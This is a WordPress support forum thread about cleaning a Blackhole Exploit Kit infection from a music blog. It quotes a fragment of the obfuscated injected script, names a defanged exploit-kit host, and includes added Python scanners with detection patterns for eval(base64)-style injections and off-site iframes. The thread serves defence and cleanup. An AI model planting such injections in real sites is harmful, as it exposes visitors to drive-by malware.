

Blackhole Exploit Kit in my site, no clue about how to remove it (22 posts)

  1. Dirtysoundwavess
    Posted 2 years ago #

    So the problems with Blackhole Exploit Kit have shown up again, after a week of no signs. Visitors have sent me messages about the warnings they got, and I have no clue how to clean the site. I checked the .htaccess file as well as style.css and found nothing that I would suspect.

    Noticed also that the virus often shows up in category pages.

    I run all the latest, updated timthumb, etc. Don't know if there is any more info you need to track the virus?

    Site: Dirtysoundwaves.net (can be risky, even though I visit it every day)

  2. Dirtysoundwavess
    Posted 2 years ago #

    Here are the results from AVG.
    The black hole exploits seem to be pretty active, but not the JavaScript malware.

  3. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

  4. Dirtysoundwavess
    Posted 2 years ago #

    Thanks kmessinger, I've already checked them out. NOTHING says how to find blackhole exploits, that's all I want to know. Then I can use your links to clean the site.

  5. gadi.AV
    Posted 2 years ago #

    Hi DSW,
    I have an interest in your case, can you please send me a link to your pages (specifically ones which were reported as malicious)?
    Can you please let me know how users knew they were attacked by Blackhole?


  6. Johannes96
    Posted 2 years ago #

    Hello gadi.AV, lost my previous account which I posted this topic with. So I'm using this one instead.

    Must say that I'm thankful for your interest in helping me!

    The problems when users got blocked or warned about my site started about 3 weeks ago, so I took the case to another forum. After some the black hole exploit kit doesn't show all the time (attacking PCs), so they recommended that I remove the category page, where they found suspected JavaScript.

    </div></div> </aside> <!--End Sidebar--> </div> <!--End Container-->
    <script type="text/javascript">if('PRgB'=='WIXmQj')eHKuj='ESlJVV';if('KyvNR'=='SETEu')fmxLG();var zSLLL=256;if('Achu'=='sMjaGB')XiGL='ZPjAu';var hv .

    So I did remove the category and fixed the threat according to AVG.

    The result from AVG can be found here (Link). As you see, the JavaScript threat hasn't been reported for 30 days.

    What's remaining though is the Blackhole Exploit Kit, which is still active. And that's the problem, I have only met the virus once. And it was reported as Trojan, a window with false Antivirus tried to install in my computer. So I'm not really sure what it really is!
    Here is a screenshot of Avast reporting an iframe as a threat.
    Also my browser (Opera) often blocks my site.

    here is what 28 other webscanners show - https://www.virustotal.com/url/32cbf5296b07dd220d572de32b4432d464e48075a42fc56a77627995eb2e88a9/analysis/1340703454/

    You are apparently the only one who can help me.

  7. gadi.AV
    Posted 2 years ago #

    I still see a malicious script on the site just before the end inner tag.
    The script is called from: Referer: dirtysoundwaves(dot)net/category/house-music/ (don't go there)
    and calls an exploit kit from minussqlite(dot)biz (don't go there :)
    There might be other URLs as well in such an attack.

    [ code removed - use pastebin instead ]

  8. gadi.AV
    Posted 2 years ago #

    A Link to the code snippet which is injected:

  9. Johannes96
    Posted 2 years ago #

    Hmm, it might be that script. But I've been trying to figure out how to find the script in "End inner tag".

  10. gadi.AV
    Posted 2 years ago #

    Can help you there, I am no wordpress expert.

  11. cjchamberland
    Posted 2 years ago #

    Look at your theme's index.php, footer.php and functions.php files. See if there is any strange code at the bottom of the index.php, or at the top of your footer.php file. Or they may have a function that they placed in your functions.php file that is getting called in the footer. Typically it will start out with "eval(base64...."
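
The check described in the post above, as an added example that is not part of the original thread: a Python scan of a theme directory for `eval(base64...`-style code. The rule set, the `scan_theme` and `build_sample_theme` names and the sample theme files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Files named in the post above; findings in them are listed first.
PRIORITY = ("index.php", "footer.php", "functions.php")

# Heuristic rules (assumptions for this example, not a full signature set).
RULES = {
    "eval-of-decoded-data": re.compile(
        r"\beval\s*\(\s*@?\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
        re.I),
    "long-base64-literal": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
    "markup-after-closing-html": re.compile(r"</html>\s*<(?:script|iframe)\b", re.I),
}

def scan_theme(theme_dir):
    """Return (file, line, rule) findings for every .php file under theme_dir."""
    findings = []
    for path in Path(theme_dir).rglob("*.php"):
        text = path.read_text(encoding="utf-8", errors="replace")
        rel = path.relative_to(theme_dir).as_posix()
        for rule, rx in RULES.items():
            for m in rx.finditer(text):
                line = text.count("\n", 0, m.start()) + 1
                findings.append((rel, line, rule))
    return sorted(findings, key=lambda f: (f[0] not in PRIORITY, f))

def build_sample_theme(root):
    """Write a constructed theme: one clean file, two with injected code."""
    root = Path(root)
    (root / "index.php").write_text("<?php get_header(); ?>\n<?php get_footer(); ?>\n")
    (root / "footer.php").write_text(
        "<?php wp_footer(); ?>\n</body>\n</html>\n<script>var a=1;</script>\n")
    # The base64 string is a harmless constructed value; it is never executed.
    (root / "functions.php").write_text(
        "<?php\nfunction theme_setup() {}\n"
        "eval(base64_decode('ZWNobyAiY29uc3RydWN0ZWQiOw=='));\n")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        for finding in scan_theme(build_sample_theme(d)):
            print(finding)
```

Each finding is a lead to read in context, not a verdict; compare flagged files against a fresh copy of the theme before deleting anything.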

  12. Johannes96
    Posted 2 years ago #

    This is the closest code I found

    [Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]

    Or this one


    Not sure if it's right, but I'm really bad at finding harmful codes. All looks the same for me.

  13. Johannes96
    Posted 2 years ago #

    I'm actually ready to give admin access just to get rid of the malware.
    So if there is any good hearted ones, please!

  14. redleg-too
    Posted 2 years ago #

    The code you have listed above is malicious.

  15. gadi.AV
    Posted 2 years ago #

    [Code moderated. Please do not post hack code blocks in the forums. Please use the pastebin]

  16. Johannes96
    Posted 2 years ago #

    Wow, never thought I would find it.
    Next step would be to remove the codes, I guess?

    Copied whole code, don't know where to remove

    [Code moderated as per the Forum Rules. The maximum number of lines of code that you can post in these forums is ten lines. Please use the pastebin]

  17. Johannes96
    Posted 2 years ago #


    Well here is the code on pastebin



    How can I remove the codes?

  18. esmi
    Forum Moderator
    Posted 2 years ago #

    Please refer to the links posted near the top of this topic.

  19. cjchamberland
    Posted 2 years ago #

    just remove everything below the

    <?php include TEMPLATEPATH . '/banner-bottom.php'; ?>

  20. Johannes96
    Posted 2 years ago #

    I think it's gone, removed both from footer and index. And the site works.

    Now how can I check if the site is clean?
    AVG shows only results from reports by their users.
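
One check on the rendered page after a cleanup like the one above, as an added example that is not part of the original thread: it lists `script`/`iframe` sources on hosts you did not expect and flags inline scripts shaped like the snippet quoted earlier (`if('PRgB'=='WIXmQj')...`). The `audit_html` name, the host names and the sample page are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Shape of the snippet quoted in the thread: if('PRgB'=='WIXmQj')...
DEAD_BRANCH = re.compile(r"if\s*\(\s*'\w+'\s*==\s*'\w+'\s*\)")

class PageAudit(HTMLParser):
    """Collect off-site script/iframe hosts and obfuscated inline scripts."""
    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted = {h.lower() for h in trusted_hosts}
        self.external = []    # (tag, host) pairs not in trusted_hosts
        self.obfuscated = []  # scripts with >= 2 always-false string compares
        self._buf = None      # list while inside <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            host = urlparse(dict(attrs).get("src") or "").hostname
            if host and host not in self.trusted:
                self.external.append((tag, host))
        if tag == "script":
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            body = "".join(self._buf)
            if len(DEAD_BRANCH.findall(body)) >= 2:
                self.obfuscated.append(body[:40])
            self._buf = None

def audit_html(html, trusted_hosts):
    audit = PageAudit(trusted_hosts)
    audit.feed(html)
    audit.close()
    return audit.external, audit.obfuscated

# Constructed page: hosts and script body are made up for this example.
SAMPLE = """<html><body><div>posts</div>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="http://cdn.example.org/lib.js"></script>
<iframe src="http://injected.example/in.php" width="1"></iframe>
<script>if('PRgB'=='WIXmQj')a='b';if('KyvNR'=='SETEu')f();var z=256;</script>
</body></html>"""
if __name__ == "__main__":
    print(audit_html(SAMPLE, ["myblog.example", "cdn.example.org"]))
```

An empty result from one saved copy of a page is not conclusive: as noted earlier in the thread, the injected code did not show up on every visit, so check several pages (category pages included) more than once.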

  21. pbut
    Posted 2 years ago #

    I am using the Imbalance theme and my website - http://www.pierrotphoto.co.uk went live about four weeks ago. Over the last two days one of my American friends has said that she can't access one of my categories/page - Cromer fancy dress - because it's being blocked by her antivirus. She is accessing it via a link I have on Facebook (which is my web address that I typed in as - http://www.pierrotphoto.co.uk). Currently she is the only person who has informed me of this problem - have had over a 1000 page views.
    I trust her judgment and I am NOT a WordPress expert - self taught and a struggler!!
    I have tried to follow the discussion above but am uncertain what to look for in the index, footer and header. No indication of
    Any help, guidance will be of great interest.
    When the US wakes up - I will try and find out the antivirus. She is using AVG free version.
    Just spoken to her - the issue appears to emanate from the typed link I have in my Facebook - Pierre Butikofer
    All other access appears to work - i.e. directly or via Twitter

    Any help will be gratefully accepted. Hope I have been relatively clear


    Pierre Butikofer

  22. Dirtysoundwavess
    Posted 1 year ago #

    Hi Pierre, I'm happy to help. According to AVG, your site should be pretty safe?

Topic Closed

This topic has been closed to new replies.
